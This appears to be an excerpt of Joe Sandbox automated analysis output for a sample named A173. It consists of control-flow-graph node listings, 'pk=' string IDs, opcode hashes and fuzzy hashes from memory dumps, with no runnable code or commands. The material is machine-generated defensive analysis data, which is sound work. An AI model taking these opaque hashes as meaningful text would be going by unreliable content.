                                                                                  • Instruction Fuzzy Hash: 1791B678704200CFC305EB55D196A6BB3B7EBC9340F24857AD5068B39ADB34BD828F96
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 848 47275c9-47275e1 916 47275e4 call 4727590 848->916 917 47275e4 call 4727580 848->917 918 47275e4 call 4727aa0 848->918 919 47275e4 call 4727549 848->919 920 47275e4 call 47275ef 848->920 850 47275ea-4727634 910 4727637 call 475bb91 850->910 911 4727637 call 475bba0 850->911 853 472763d-47278ea 857 47278f0-47278fe 853->857 858 4727819-472783a 853->858 859 4727646-4727649 857->859 860 4727904-4727906 857->860 914 472783d call 475c1a0 858->914 915 472783d call 475c193 858->915 861 472786a-472786c 859->861 862 472764f 859->862 860->859 873 4727872-4727898 861->873 874 4727913-4727918 861->874 862->861 864 4727783-47277a3 862->864 865 47278a3-47278a8 862->865 866 4727656-47276de call 47240e0 862->866 867 47276e5-4727723 862->867 868 47277fa-472780b 862->868 869 472772a-4727749 862->869 870 4727609-4727613 862->870 871 47277af-47277b3 862->871 872 47277dd-47277e4 862->872 897 47277a5-47277aa 864->897 898 47277bf-47277d1 864->898 865->868 877 47278ae-47278bf 865->877 866->867 867->869 868->859 875 4727811-4727814 868->875 869->873 896 472774f-472777e 869->896 878 47277f0-47277f2 871->878 879 47277b5-47277ba 871->879 872->878 880 47277e6-47277eb 872->880 912 472789b call 475ebb9 873->912 913 472789b call 475ebc8 873->913 874->859 875->859 876 4727843-4727845 884 472790b-472790d 876->884 885 472784b-472785c 876->885 877->859 887 47278c5 877->887 878->868 879->859 880->859 884->873 884->874 885->859 890 4727862-4727865 885->890 887->859 890->859 890->861 892 47278a1 892->865 896->859 898->864 903 47277d3 898->903 903->872 910->853 911->853 912->892 913->892 914->876 915->876 916->850 917->850 918->850 919->850 920->850
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187186730.0000000004720000.00000040.00000800.00020000.00000000.sdmp, Offset: 04720000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_4720000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=
                                                                                  • API String ID: 0-2446172515
                                                                                  • Opcode ID: 9064dabdd1a0cfa944b368088e0dac69316789094ad3953bae1a95d1e3db8862
                                                                                  • Instruction ID: c178c6b914ffd15c08302e61818554eedd593edd0d5baedb266a94b44486da4b
                                                                                  • Opcode Fuzzy Hash: 9064dabdd1a0cfa944b368088e0dac69316789094ad3953bae1a95d1e3db8862
                                                                                  • Instruction Fuzzy Hash: 01810475700114DFD718EF59E692BAA73B7EB88310F208126E4419B3D9DB34AD81CBA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 921 47535b0-475362f call 4752a10 call 4752a90 call 4753aa0 929 4753631-4753645 921->929 930 475366d-4753693 921->930 933 4753647 929->933 934 475364e-475366b 929->934 938 4753999-47539c4 930->938 939 4753699-4753757 930->939 933->934 934->930 947 47539c6-47539e1 938->947 948 4753a20-4753a39 938->948 969 475375d-4753787 939->969 970 475383b-4753854 939->970 957 47539e3-4753a02 947->957 958 4753a0d-4753a1e 947->958 951 4753a49 948->951 952 4753a3b-4753a41 948->952 952->951 957->958 964 4753a04-4753a06 957->964 958->947 958->948 964->958 977 47537b4-47537c2 969->977 978 4753789-47537b2 call 4752998 969->978 972 4753864 970->972 973 4753856-475385c 970->973 972->938 973->972 981 47537c4-47537cd 977->981 982 47537cf-47537d1 977->982 978->977 987 4753824-4753835 978->987 981->987 1001 47537d6 call 472ad53 982->1001 1002 47537d6 call 472ad60 982->1002 985 47537db-47537dd 988 47537df-47537e8 985->988 989 47537ea-47537f8 985->989 987->969 987->970 988->987 994 4753805-4753809 989->994 995 47537fa-4753803 989->995 994->987 996 475380b-4753819 994->996 995->987 996->987 999 475381b-475381d 996->999 999->987 1001->985 1002->985
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187320175.0000000004750000.00000040.00000800.00020000.00000000.sdmp, Offset: 04750000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_4750000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$3#
                                                                                  • API String ID: 0-4161618879
                                                                                  • Opcode ID: fcd900e3e373c318c5438c8ef9d1be7f0efdb046e78011d7ec32146f59c7c504
                                                                                  • Instruction ID: 31274d6f71fda2429789406fb9c27188ad0256cdc35e0d6f928abd7b354b0020
                                                                                  • Opcode Fuzzy Hash: fcd900e3e373c318c5438c8ef9d1be7f0efdb046e78011d7ec32146f59c7c504
                                                                                  • Instruction Fuzzy Hash: 27919470B002048BDB19AF65E4556AE77B7FFC8744F208429D802DB7A8DF74AC46CBA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1087 47275ef-47275f3 1088 47275f5-4727603 1087->1088 1089 47275c9-47275e1 1087->1089 1090 4727605-4727607 1088->1090 1091 47275b9-47275bc 1088->1091 1210 47275e4 call 4727590 1089->1210 1211 47275e4 call 4727580 1089->1211 1212 47275e4 call 4727aa0 1089->1212 1213 47275e4 call 4727549 1089->1213 1214 47275e4 call 47275ef 1089->1214 1090->1091 1093 47275c2 1091->1093 1094 47279ef-4727a29 1091->1094 1093->1093 1104 4727a2b-4727a2d 1094->1104 1105 4727a9d-4727a9f 1094->1105 1095 47275ea-4727634 1206 4727637 call 475bb91 1095->1206 1207 4727637 call 475bba0 1095->1207 1101 472763d-47278ea 1120 47278f0-47278fe 1101->1120 1121 4727819-472783a 1101->1121 1106 4727aa1-4727aa2 1104->1106 1107 4727a2f-4727a31 1104->1107 1105->1106 1109 4727aa4 1106->1109 1110 4727aa8 1106->1110 1111 4727a33-4727a35 1107->1111 1112 4727aa5-4727aa7 1107->1112 1109->1112 1114 4727aa9-4727aaa 1110->1114 1113 4727a37-4727a39 1111->1113 1111->1114 1112->1110 1116 4727a3b-4727a3d 1113->1116 1117 4727aad-4727aae 1113->1117 1118 4727ab0 1114->1118 1119 4727aac 1114->1119 1124 4727ab1-4727ab3 1116->1124 1125 4727a3f-4727a41 1116->1125 1117->1118 1118->1124 1119->1117 1122 4727646-4727649 1120->1122 1123 4727904-4727906 1120->1123 1208 472783d call 475c1a0 1121->1208 1209 472783d call 475c193 1121->1209 1126 472786a-472786c 1122->1126 1127 472764f 1122->1127 1123->1122 1130 4727ab5-4727ab6 1124->1130 1129 4727a43-4727a45 1125->1129 1125->1130 1141 4727872-4727898 1126->1141 1142 4727913-4727918 1126->1142 1127->1126 1132 4727783-47277a3 1127->1132 1133 47278a3-47278a8 1127->1133 1134 4727656-47276de call 47240e0 1127->1134 1135 47276e5-4727723 1127->1135 1136 47277fa-472780b 1127->1136 1137 472772a-4727749 1127->1137 1138 4727609-4727613 1127->1138 1139 47277af-47277b3 1127->1139 1140 47277dd-47277e4 1127->1140 1143 4727a47-4727a49 1129->1143 1144 4727ab9-4727abb 1129->1144 1130->1144 1176 47277a5-47277aa 1132->1176 1177 47277bf-47277d1 1132->1177 1133->1136 1152 47278ae-47278bf 1133->1152 1134->1135 1135->1137 1136->1122 1149 4727811-4727814 1136->1149 1137->1141 1175 472774f-472777e 1137->1175 1145 47277f0-47277f2 1139->1145 1146 47277b5-47277ba 1139->1146 1140->1145 1148 47277e6-47277eb 1140->1148 1204 472789b call 475ebb9 1141->1204 1205 472789b call 475ebc8 1141->1205 1142->1122 1147 4727abd-4727ac0 1143->1147 1151 4727a4b-4727a4d 1143->1151 1144->1147 1145->1136 1146->1122 1155 4727ac1-4727ac4 1147->1155 1148->1122 1149->1122 1150 4727843-4727845 1158 472790b-472790d 1150->1158 1159 472784b-472785c 1150->1159 1151->1155 1160 4727a4f-4727a51 1151->1160 1152->1122 1161 47278c5 1152->1161 1158->1141 1158->1142 1159->1122 1164 4727862-4727865 1159->1164 1165 4727a53-4727a55 1160->1165 1166 4727ac5-4727ac7 1160->1166 1161->1122 1164->1122 1164->1126 1170 4727ac9-4727aca 1165->1170 1173 4727a57-4727a62 1165->1173 1166->1170 1178 4727ad0-4727ad2 1170->1178 1179 4727acc-4727ace 1170->1179 1171 47278a1 1171->1133 1180 4727a64-4727a66 1173->1180 1181 4727a68 1173->1181 1175->1122 1177->1132 1189 47277d3 1177->1189 1183 4727ad4-4727ad7 1178->1183 1184 4727ad8-4727b2d 1178->1184 1179->1178 1180->1181 1181->1105 1183->1184 1195 4727ae9-4727b02 call 4727be1 1184->1195 1196 4727b2f 1184->1196 1189->1140 1202 4727b08-4727b0b 1195->1202 1204->1171 1205->1171 1206->1101 1207->1101 1208->1150 1209->1150 1210->1095 1211->1095 1212->1095 1213->1095 1214->1095
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187186730.0000000004720000.00000040.00000800.00020000.00000000.sdmp, Offset: 04720000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_4720000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=
                                                                                  • API String ID: 0-3336634748
                                                                                  • Opcode ID: f24ce875fd0b309cdc70dc19d5648047db235eaa55f51bfb6e46b46f1b2bd3c3
                                                                                  • Instruction ID: 3d1a8686be91879c184607919bbe5969c48539131beba6300a93f30098769e9a
                                                                                  • Opcode Fuzzy Hash: f24ce875fd0b309cdc70dc19d5648047db235eaa55f51bfb6e46b46f1b2bd3c3
                                                                                  • Instruction Fuzzy Hash: 7871F475700114DFD718EF69E696BAA73B7EB8C310F208026E5419B3D9DB34AD81CBA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1215 4726588-47265a8 1216 4726668-4726691 call 4726858 call 4723a50 1215->1216 1217 47265ad-47265b0 1215->1217 1240 4726663 1216->1240 1218 47265b2 1217->1218 1219 4726624-4726626 1217->1219 1218->1219 1221 47266d3-47266eb 1218->1221 1222 47265da-472660a 1218->1222 1223 47265b9-47265d8 1218->1223 1220 47266b3-47266c6 1219->1220 1220->1217 1226 47266cc-47266ce 1220->1226 1235 47266f2-47266f5 1221->1235 1236 47266ed-47266f0 1221->1236 1241 4726693-47266ab 1222->1241 1242 4726610-472661e 1222->1242 1223->1219 1223->1222 1226->1217 1238 47266f8-4726733 call 4727549 1235->1238 1236->1238 1248 4726739-472673d 1238->1248 1240->1223 1241->1220 1242->1217 1244 4726620-4726622 1242->1244 1244->1217 1249 4726793-47267fe 1248->1249 1250 472673f-4726788 1248->1250 1250->1249
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187186730.0000000004720000.00000040.00000800.00020000.00000000.sdmp, Offset: 04720000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_4720000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=
                                                                                  • API String ID: 0-3336634748
                                                                                  • Opcode ID: 5cf58aa34c66b5ca8f2d008a7719f2d39fa8ae13c1b525b0dc952483472ccc44
                                                                                  • Instruction ID: bed854fc034382e602af5d4c4ecedc1e844de3caffe895fe3bd33da407ca1b30
                                                                                  • Opcode Fuzzy Hash: 5cf58aa34c66b5ca8f2d008a7719f2d39fa8ae13c1b525b0dc952483472ccc44
                                                                                  • Instruction Fuzzy Hash: F161C575B00204AFCB05EFA5E595AEE77B6EB8D300F14812AE502D7349DF34AD858BA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1259 4727d8e-4727d93 1260 4727d9d-4727da3 1259->1260 1309 4727da5 call 4993f81 1260->1309 1310 4727da5 call 4993f90 1260->1310 1261 4727dab-4727dad 1262 4727db3-4727dbe 1261->1262 1263 4727f1b-4727f54 call 47237a0 1261->1263 1264 4727dc0-4727dc5 1262->1264 1265 4727d59-4727d5c 1262->1265 1279 4727f5a-4727f5f 1263->1279 1280 47281a8-47281c7 1263->1280 1264->1265 1267 4727d62 1265->1267 1268 4728254-4728273 1265->1268 1267->1259 1274 47280e5-472811e call 47237a0 1268->1274 1275 4728279-472827e 1268->1275 1290 4728124-4728132 1274->1290 1291 4727ecc-4727eeb 1274->1291 1275->1265 1277 4728283-4728288 1275->1277 1279->1265 1286 4727e35-4727e54 1280->1286 1287 47281cd 1280->1287 1286->1274 1295 4727e5a-47280a3 call 47237a0 1286->1295 1287->1268 1290->1265 1292 4728138 1290->1292 1298 4727ef1 1291->1298 1299 4727deb-4727e0b 1291->1299 1292->1265 1295->1274 1307 47280a5-47280b3 1295->1307 1298->1263 1299->1277 1307->1265 1308 47280b9-47280bb 1307->1308 1308->1265 1309->1261 1310->1261
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187186730.0000000004720000.00000040.00000800.00020000.00000000.sdmp, Offset: 04720000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_4720000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=
                                                                                  • API String ID: 0-3336634748
                                                                                  • Opcode ID: 3d00cba9d36e18b738f438d3523f10c9ff149917465413a28dce7b65efef02db
                                                                                  • Instruction ID: a0de1fac15b271ca7002ad74497cfaef6c4c65645d3ae400915e91ba2942fc23
                                                                                  • Opcode Fuzzy Hash: 3d00cba9d36e18b738f438d3523f10c9ff149917465413a28dce7b65efef02db
                                                                                  • Instruction Fuzzy Hash: FF41B1B43041118BD74DBA6AE66573B32ABE7C9344F14C02BD106CB398DF34AC868BA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187320175.0000000004750000.00000040.00000800.00020000.00000000.sdmp, Offset: 04750000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_4750000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=
                                                                                  • API String ID: 0-2787024803
                                                                                  • Opcode ID: 16950ec5c19865775ac9d7a733b5146f2119c88fd9845e84b0860c2e7c593339
                                                                                  • Instruction ID: 33e2f1341e1a748e82020500815ea2913f0dcc117672ff6fb9757af1cd117755
                                                                                  • Opcode Fuzzy Hash: 16950ec5c19865775ac9d7a733b5146f2119c88fd9845e84b0860c2e7c593339
                                                                                  • Instruction Fuzzy Hash: 1C819374704204DFD70AEF65D0957AF77B6EB89300F20806AE542DB399DB74BD828BA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187186730.0000000004720000.00000040.00000800.00020000.00000000.sdmp, Offset: 04720000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_4720000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=
                                                                                  • API String ID: 0-2787024803
                                                                                  • Opcode ID: 525facdedc9aacdd81db4fcd64b122dc2153353ee4156be587dfe0b57c0f8322
                                                                                  • Instruction ID: 25e11cf1f44cd0c16a0cc03d2344c86ba16afd33d99705f4afae3032f959ea7f
                                                                                  • Opcode Fuzzy Hash: 525facdedc9aacdd81db4fcd64b122dc2153353ee4156be587dfe0b57c0f8322
                                                                                  • Instruction Fuzzy Hash: E461F975700204AFCB05EFA5E5946EE77B6EB8D300F14816BE502D7349DF34AD858BA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187186730.0000000004720000.00000040.00000800.00020000.00000000.sdmp, Offset: 04720000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_4720000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: pk=$pk=$pk=$pk=$pk=$pk=$pk=$pk=
                                                                                  • API String ID: 0-2787024803
                                                                                  • Opcode ID: 84a1a6b491ab7cb9cf068b94f3c47807541bef88ca27bd852a927cef3453d53e
                                                                                  • Instruction ID: 459ea96ad306ca71d01597b3a826b8234299421495c9f1a77820978fc4d9ad87
                                                                                  • Opcode Fuzzy Hash: 84a1a6b491ab7cb9cf068b94f3c47807541bef88ca27bd852a927cef3453d53e
                                                                                  • Instruction Fuzzy Hash: 4B319C747042048FD70AEF99E2557AE73B7EB99300F248026E406DB399DB38FD418B51
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187320175.0000000004750000.00000040.00000800.00020000.00000000.sdmp, Offset: 04750000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_4750000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: pk=$pk=$pk=$pk=$pk=$pk=$3#
                                                                                  • API String ID: 0-652380528
                                                                                  • Opcode ID: 0d65ed08f1aed01d821da3f0ce7249ab4641b0739063423dcaa669c083f799b0
                                                                                  • Instruction ID: 9ddf4d0f8aab0fdc4ec3f7dddde0c498580ce4f209e7e75ad13159a320ecdbf4
                                                                                  • Opcode Fuzzy Hash: 0d65ed08f1aed01d821da3f0ce7249ab4641b0739063423dcaa669c083f799b0
                                                                                  • Instruction Fuzzy Hash: F451B370B002049BDB19AF75E4556AE77B7FF88344B204429E802DB7A5DF34AD06CBA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187752902.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_49c0000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: pk=$pk=$pk=$pk=$pk=$pk=$pk=
                                                                                  • API String ID: 0-1287439754
                                                                                  • Opcode ID: e81a40c8a0faf2c40cb433de690c8018a3bf9efca04abf5f98a939eadc18250e
                                                                                  • Instruction ID: ed61d5f14c61cb15ec9fe43b5132790a1dcd89ea4660a473f077b82398215674
                                                                                  • Opcode Fuzzy Hash: e81a40c8a0faf2c40cb433de690c8018a3bf9efca04abf5f98a939eadc18250e
                                                                                  • Instruction Fuzzy Hash: 17615974700229EFEB15DF54E854BAA77B6EB48314F1180B9E80997399DB34BD80CF62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187320175.0000000004750000.00000040.00000800.00020000.00000000.sdmp, Offset: 04750000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_4750000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: pk=$pk=$pk=$pk=$pk=$pk=$pk=
                                                                                  • API String ID: 0-1287439754
                                                                                  • Opcode ID: 54d913e06784ca231388955ced5328d9c9c7ae974713def3866603b353b004a4
                                                                                  • Instruction ID: 853573fd1cf902d770e929eb97f2cc7f760371444a5171cf2008082b1f25b615
                                                                                  • Opcode Fuzzy Hash: 54d913e06784ca231388955ced5328d9c9c7ae974713def3866603b353b004a4
                                                                                  • Instruction Fuzzy Hash: 20517671F002089BCB15DFA9E4555DE77B6EF89340F24812AE805EB359DF70AD46CB90
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187752902.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_49c0000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: pk=$pk=$pk=$pk=$pk=$pk=$pk=
                                                                                  • API String ID: 0-1287439754
                                                                                  • Opcode ID: d59721c1c540191db55e151b7ae323a277760845692c3a79290b5f1782608fcd
                                                                                  • Instruction ID: c46c8759e395e41ca4ddaef48de781cf692d458cd0551c8be7957292f16bf102
                                                                                  • Opcode Fuzzy Hash: d59721c1c540191db55e151b7ae323a277760845692c3a79290b5f1782608fcd
                                                                                  • Instruction Fuzzy Hash: 1E516B74700215EFEB04EF54D855BAA73B7EB88314F1180B9E50597399CB30BD80CB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187320175.0000000004750000.00000040.00000800.00020000.00000000.sdmp, Offset: 04750000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_4750000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: pk=$pk=$pk=$pk=$pk=$pk=$pk=
                                                                                  • API String ID: 0-1287439754
                                                                                  • Opcode ID: 1df15375b13d835a2d04f4ce0f1a5891661869b6ac69e76e2252a173b0054e47
                                                                                  • Instruction ID: 179ca0759675acd250a1658bc59103d0e57a30b7e28c1b7abbc222317c73287a
                                                                                  • Opcode Fuzzy Hash: 1df15375b13d835a2d04f4ce0f1a5891661869b6ac69e76e2252a173b0054e47
                                                                                  • Instruction Fuzzy Hash: 84417375F002089BCB15DFA9E4555EEB7B6EF88340F24812AE805EB359DF70AD46CB90
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187186730.0000000004720000.00000040.00000800.00020000.00000000.sdmp, Offset: 04720000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_4720000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: pk=$pk=$pk=$pk=$pk=$pk=$pk=
                                                                                  • API String ID: 0-1287439754
                                                                                  • Opcode ID: 40556f28e032fd0e2bbaf3689925bf339f1e4254c87ce3280f53a90a4fcc4dbc
                                                                                  • Instruction ID: 1afb3ff9ee3aa114944d08f9f5f18a4f54077f7b7bcf428eec9e1aa4e5f9db09
                                                                                  • Opcode Fuzzy Hash: 40556f28e032fd0e2bbaf3689925bf339f1e4254c87ce3280f53a90a4fcc4dbc
                                                                                  • Instruction Fuzzy Hash: C3419D75B00204CFDB0AEF69E1596AE77B7FB89300F10856AD44287798DF34AD86CB91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187657178.0000000004990000.00000040.00000800.00020000.00000000.sdmp, Offset: 04990000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_4990000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: pk=$pk=$pk=$pk=$pk=$pk=$pk=
                                                                                  • API String ID: 0-1287439754
                                                                                  • Opcode ID: 0f3e1b86528b8c51d50b15d51e87c7798c94cc156434b41595e3ccd6144a37ff
                                                                                  • Instruction ID: ab539479524ad2360f784027c9126d5e8d2e4621b32fcc91e6cc317d3dc9d5ce
                                                                                  • Opcode Fuzzy Hash: 0f3e1b86528b8c51d50b15d51e87c7798c94cc156434b41595e3ccd6144a37ff
                                                                                  • Instruction Fuzzy Hash: A3417C757042049BDB49FB68E4556AF72E7EBCE744F20403AE806C7389DF34AD4187A2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187186730.0000000004720000.00000040.00000800.00020000.00000000.sdmp, Offset: 04720000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_4720000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: pk=$pk=$pk=$pk=$pk=$pk=
                                                                                  • API String ID: 0-2247996052
                                                                                  • Opcode ID: d4028bd49d5669f209842a60b67c5b610aad1ede64026a222e581797a58a854d
                                                                                  • Instruction ID: cc6f7b2a01d6e305f08665328c13674ccb74aaef161a75f9d70c1604aea00d12
                                                                                  • Opcode Fuzzy Hash: d4028bd49d5669f209842a60b67c5b610aad1ede64026a222e581797a58a854d
                                                                                  • Instruction Fuzzy Hash: AA51B175B00114DFD719EF69E692B9A73B7EB88350F208026E5019B399DB34AD81CBA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187320175.0000000004750000.00000040.00000800.00020000.00000000.sdmp, Offset: 04750000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_4750000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: pk=$pk=$pk=$pk=$pk=$pk=
                                                                                  • API String ID: 0-2247996052
                                                                                  • Opcode ID: 8bc8fdb747fe9b587eb97e9b3888cc671c69d29adeb5c3b45ae7ef76d30faac4
                                                                                  • Instruction ID: 0b05c2fdf2111614fc8060d32e5684f18e5077ca3b747bfbe0ddf9bb5eddca72
                                                                                  • Opcode Fuzzy Hash: 8bc8fdb747fe9b587eb97e9b3888cc671c69d29adeb5c3b45ae7ef76d30faac4
                                                                                  • Instruction Fuzzy Hash: BE4182757002048FDB05EF68D495AAE77BBEBCD314B14406AE905DB395DF34AC428BA0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187320175.0000000004750000.00000040.00000800.00020000.00000000.sdmp, Offset: 04750000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_4750000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: pk=$pk=$pk=$pk=$pk=$pk=
                                                                                  • API String ID: 0-2247996052
                                                                                  • Opcode ID: eebd8b93e782e5303cc4ad1059b13e62a59258140397ff7ce0f9eec748292144
                                                                                  • Instruction ID: 151b2c0a9da4e7423ba5ab254de3a44c98c0caec396ce43b888e2183a9437eb5
                                                                                  • Opcode Fuzzy Hash: eebd8b93e782e5303cc4ad1059b13e62a59258140397ff7ce0f9eec748292144
                                                                                  • Instruction Fuzzy Hash: 594172757002048FDB09EF69D495AAE77FBEBCD314B14406AE905DB399DF34AC428BA0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187752902.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_49c0000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: pk=$pk=$pk=$pk=$pk=$pk=
                                                                                  • API String ID: 0-2247996052
                                                                                  • Opcode ID: 3ea383e7d9f798055c6ce25db30adff6f15afd49c85d8332ee0e9932fc657095
                                                                                  • Instruction ID: aece5204b0b65a6939b4996baf4f77dd00eb76bdeae72cf2d54dd8325b36c55f
                                                                                  • Opcode Fuzzy Hash: 3ea383e7d9f798055c6ce25db30adff6f15afd49c85d8332ee0e9932fc657095
                                                                                  • Instruction Fuzzy Hash: E3417F74704205DFD718EF54E4A57AA33B7EB89354F11857AE4068B398DB34AC81CBA2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187752902.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_49c0000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: pk=$pk=$pk=$pk=$pk=
                                                                                  • API String ID: 0-3373200426
                                                                                  • Opcode ID: 702d413c52a6026707c767cc6508b53c49bff7a522581399a865395c0c95f2d7
                                                                                  • Instruction ID: c666ad516551bdfb319224ddd39d62369521801ec148626df52315f9cb22cae2
                                                                                  • Opcode Fuzzy Hash: 702d413c52a6026707c767cc6508b53c49bff7a522581399a865395c0c95f2d7
